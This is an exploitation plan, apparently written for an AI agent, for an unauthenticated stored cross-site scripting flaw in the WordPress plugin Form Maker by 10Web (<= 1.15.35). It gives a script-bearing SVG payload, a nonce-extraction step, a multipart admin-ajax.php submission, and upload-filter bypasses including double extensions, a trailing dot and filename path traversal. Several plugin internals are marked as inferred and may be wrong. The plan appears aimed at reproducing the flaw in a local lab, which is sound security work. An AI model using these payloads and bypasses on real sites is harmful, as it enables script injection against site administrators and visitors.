Form Maker by 10Web <= 1.15.35 - Unauthenticated Stored Cross-Site Scripting via SVG file

This research plan outlines the process for exploiting a Stored Cross-Site Scripting (XSS) vulnerability in Form Maker by 10Web (<= 1.15.35) via malicious SVG file uploads.

---

1. Vulnerability Summary

The vulnerability arises because the plugin allows unauthenticated users to upload SVG files through form fields. While the plugin attempts to validate file extensions, its validation logic is weak (likely substring-based or improperly configured allowlist), and it fails to sanitize the content of SVG files. Since SVG is an XML-based image format, it can embed <script> tags. When an administrator views the submission or a visitor accesses the file URL directly, the embedded JavaScript executes in the context of the site.

2. Attack Vector Analysis

• Endpoint: admin-ajax.php (for unauthenticated form submission).
• Action: wp_ajax_nopriv_form_maker_submit_form or form_maker_save (inferred).
• Payload Parameter: A multipart/form-data file upload field associated with a specific form.
• Preconditions:
  • A form must be created that includes a "File Upload" field.
  • The "Allow Extensions" setting for that field must include svg (which is often allowed by default or easily bypassed due to weak validation).
  • The form must be published on a public-facing page.

3. Code Flow (Inferred)

1. Entry Point: FormMakerController::form_maker_submit_form (or similar AJAX handler) is triggered via admin-ajax.php.
2. Form Processing: The plugin identifies the form ID from the request and retrieves field definitions.
3. Upload Handling: The plugin iterates through $_FILES. It calls a validation function (likely in models/FormMakerModel.php or a dedicated upload class).
4. Weak Validation: The extension check likely uses a pattern like if (strpos($file_name, '.svg') !== false) or includes svg in a default $allowed_extensions array without subsequent sanitization via kses or a dedicated SVG sanitizer.
5. Storage: The file is moved to wp-content/uploads/form-maker-uploads/ using move_uploaded_file.
6. Persistence: The file path is stored in the {prefix}_form_maker_submits table.
7. Sink: When the uploaded file URL is visited, the browser renders the SVG and executes the script.

4. Nonce Acquisition Strategy

The Form Maker plugin typically requires a nonce for form submission to prevent CSRF, even for unauthenticated users.

1. Identify Shortcode: The plugin uses [formmaker id="ID_HERE"].
2. Setup Page:

   wp post create --post_type=page --post_title="Contact" --post_status=publish --post_content='[formmaker id="1"]'
   

3. Navigate: Use browser_navigate to visit the newly created page.
4. Extract Nonce:
   The plugin usually localizes script data. Use browser_eval to find the nonce:
   • Variable Name (Inferred): window.fm_object_1 or window.form_maker_obj.
   • Key (Inferred): nonce or form_maker_submit_nonce.
   • Command: browser_eval("window.fm_object_1?.nonce")
5. Identify Field Names: In the browser, inspect the file upload field's name attribute. It usually follows the pattern form_id_temp_1 or type_file_X.

5. Exploitation Strategy

Step 1: Create the Malicious SVG

Create a file named xss.svg:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert('CVE-2026-1065 XSS');
   </script>
</svg>

Step 2: Submit the Form

Perform a multipart/form-data POST request to admin-ajax.php.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Body (Multipart):
  • action: form_maker_submit_form (verify via grep -r "wp_ajax_nopriv")
  • form_id: 1
  • nonce: [EXTRACTED_NONCE]
  • type_file_1: xss.svg (The file upload field)
  • submit_form_1: 1

Step 3: Triggering XSS

1. Navigate to the WordPress Admin dashboard: wp-admin/admin.php?page=submissions_fm.
2. Select the form and view the latest submission.
3. Click the link to the uploaded file, or copy the file URL and visit it directly.

6. Test Data Setup

1. Initialize Form:
   The plugin creates default forms on activation. Ensure Form ID 1 exists.
2. Add File Upload Field:
   If Form 1 doesn't have a file upload field, use wp eval to add one to the form's metadata or use the plugin's logic to insert a field into the form_maker table.
   • Field Type: type_file
   • Allowed Extensions: svg,jpg,jpeg,png
3. Publish Page:

   wp post create --post_type=page --post_status=publish --post_content='[formmaker id="1"]'
   

7. Expected Results

• The server response should indicate a successful submission (e.g., {"status":"success"} or a redirect/success message HTML).
• The file xss.svg should exist in wp-content/uploads/form-maker-uploads/.
• Directly accessing the SVG file URL in the browser should trigger an alert() box.

8. Verification Steps

1. Check Filesystem:

   ls -R /var/www/html/wp-content/uploads/form-maker-uploads/ | grep xss.svg
   

2. Check Database Submissions:

   wp db query "SELECT * FROM wp_form_maker_submits ORDER BY id DESC LIMIT 1;"
   

3. Check Response Headers:
   Verify the file is served as image/svg+xml.

9. Alternative Approaches

• Extension Bypass: If .svg is blocked, try xss.svg.php (if the check is substring-based) or xss.svg. (trailing dot).
• Double Extension: xss.jpg.svg.
• SVG via XML: If the upload handler checks the file header for "real" images, ensure the SVG starts with <?xml or <svg.
• Path Traversal: Check if the filename parameter in the multipart request allows path traversal (e.g., filename="../../../xss.svg") to move the file outside the restricted directory.